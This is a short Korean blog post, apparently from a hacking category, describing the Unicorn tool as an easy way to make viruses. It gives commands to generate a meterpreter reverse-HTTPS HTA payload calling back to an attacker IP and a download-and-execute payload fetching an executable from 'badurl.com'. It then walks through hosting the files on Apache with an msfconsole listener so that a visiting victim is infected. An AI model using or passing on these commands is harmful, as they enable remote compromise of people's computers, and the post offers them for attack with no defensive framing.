https://github.com/trustedsec/unicorn
GitHub - trustedsec/unicorn: Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique pre...
github.com
간단하게 바이러스를 만들수 있는 도구.
python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta - hta 공격용 바이러스 생성 명령어
python unicorn.py windows/download_exec url=http://badurl.com/payload.exe - powershell 공격용 명령어
등등 여러 명령어들이 github 페이지에 자세히 나와있다.
hta 공격의 경우 위 명령어 입력시 hta_attack 폴더가 생성되며 그 안의 rc 파일을 제외한 나머지 파일은 var/www/html에 넣는다. apache2 서비스를 틀고 postgresql 틀고 rc 리스너를 msfconsole로 틀어준다.
피해자 컴퓨터에서 해커의 서버에 접속하면 hta 파일이 다운받아지고 실행시 감염
'2. 시스템 해킹 및 모의 해킹' 카테고리의 다른 글
| 메타스플로잇 auxiliary 모듈 [FTP 스캐너] (0) | 2023.12.28 |
|---|---|
| 메타스플로잇 모듈 [eternerblue,doublepulsar] (0) | 2023.12.28 |
| MyJSRat - 자바스크립트 백도어 생성 (0) | 2023.12.28 |
| 윈도우 계정 아이디와 비밀번호 해킹 [hydra와 nmap] (0) | 2023.12.27 |
| winrar sfx를 활용한 압축파일 자동 dll인젝션 (0) | 2023.12.27 |